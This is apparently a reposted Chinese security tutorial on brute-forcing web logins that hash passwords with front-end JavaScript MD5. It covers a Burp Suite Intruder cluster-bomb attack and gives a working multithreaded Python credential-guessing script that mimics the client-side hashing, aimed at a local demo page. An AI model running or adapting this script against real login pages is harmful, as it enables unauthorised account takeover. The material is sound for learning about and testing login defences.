我是靠谱客的博主 灵巧蜜粉,最近开发中收集的这篇文章主要介绍Web暴力破解--前端JS表单加密进行爆破,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

 0x01 前言

  经常看到的js实现加密的方式有:md5、base64、shal,写了一个简单的demo作为测试。

0x02 代码

登录.html

<!DOCTYPE HTML>  
<html>  
<head>  
<meta charset="utf-8">  
<title>用户登录</title>  
<script type="text/ecmascript" src="md5.js"></script>
<script>
function checkInput() {
    var password_input = document.getElementById('password');
    var password_md5 = document.getElementById('password_md5');
    // set password
    password_md5.value =hex_md5(password_input.value);
    return true;
}
</script>
</head> 
<body>  
<form action="login.php" method="post" onsubmit="return checkInput()">
    用户:<input type="text" id="username" name="username"> <br/>
    密码:<input type="password" id="password"> <br/>
    <input type="hidden" id="password_md5" name="password">
    <input type="submit" value="提交" />
</form>
</body>  
</html>  

提交表格,进行抓包,可以生成密码段密码进行了加密处理:

 0x03 Web暴力猜解

方式一:Burp Suite

  使用Intruder进行暴力猜解,Intruder支持多种爆破模式、加密和编码支持。经常看到的md5、base64、shal加密方式,都可以用burpsuite直接处理。

  四种爆破方式:单字符爆破、多字符段相同字符爆破、多字符设置对应爆破、聚合式爆破。

  最常用的应该是在爆破用户名和密码的时候,使用聚合方式枚举了。

1、抓包发送到入侵者,标记相关参数,选择第四种模式“集束炸弹”

2、分别选择用户名密码和密码密码,在设置密码密码的时候,选择md5加密码方式对密码密码段进行密码处理

3、开始进行爆破,根据返回字节长度判断是否成功,成功获得取用户名和密码段的MD5值 admin:21232f297a57a5a743894 a0e4a801fc3

4、md5破解成功,获得用户名密码 admin/admin

 方式二:Python脚本

  这边采用Python ExecJs来执行Js语句模拟前端对账号密码进入行加密

准备:

pip 安装 PyExecJS

phantomjs下载:https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-windows.zip

编写Python脚本进入爆炸:

#! /usr/bin/env python
# _*_  coding:utf-8 _*_

import requests
import threadpool
from selenium import webdriver
import execjs

def getpass(str):
    with open ('md5.js','r') as js:
        source = js.read()
        phantom = execjs.get('PhantomJS')
        getpass = phantom.compile(source)
        password = getpass.call('hex_md5',str)
        return password

def login(user,passwd):
    url="http://127.0.0.1/login.php"
    payload ={'username':user,'password':getpass(passwd)}
    headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    try:        
        response = requests.post(url,data=payload,headers=headers,timeout=5)
        result=response.content
        if result.count('fail')<1: 
            print '[success] ' +url+":"+user+':'+passwd

    except:
        pass
        
def getLines(fileName):
    list=[]
    with open(fileName, 'r') as fd:
        for line in fd.readlines():
            line = line.strip()
            if not len(line) or line.startswith('#'):
                continue
            list.append(line)
    return list

if __name__ == '__main__':    
    username_list=getLines('user.dict')
    password_list=getLines('pass.dict')

    userlist = [([user,passwd],None) for user in username_list for passwd in password_list]    
    
    pool = threadpool.ThreadPool(20)  
    reqs = threadpool.makeRequests(login,userlist)  
    [pool.putRequest(req) for req in reqs]  
    pool.wait()

 成功爆破用户账号密码

0x04 结束

   从前台到后台是一个质的突破,本文主要对很多web在登陆的过程中会用js对密码进行加密传输,梳理了下web暴猜解的技巧。

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

参考链接:

JS加密密码

http://www.cnblogs.com/mofish/archive/2012/02/25/2367858.html

js实现表单提交submit(),onsubmit

https://www.cnblogs.com/web-wjg/p/7894657.html

对登录中账号密码进行加密之后再传的爆破的思路和方式

http://www.freebuf.com/articles/web/127888.html

最后

以上就是灵巧蜜粉为你收集整理的Web暴力破解--前端JS表单加密进行爆破的全部内容,希望文章能够帮你解决Web暴力破解--前端JS表单加密进行爆破所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(56)

评论列表共有 0 条评论

立即
投稿
返回
顶部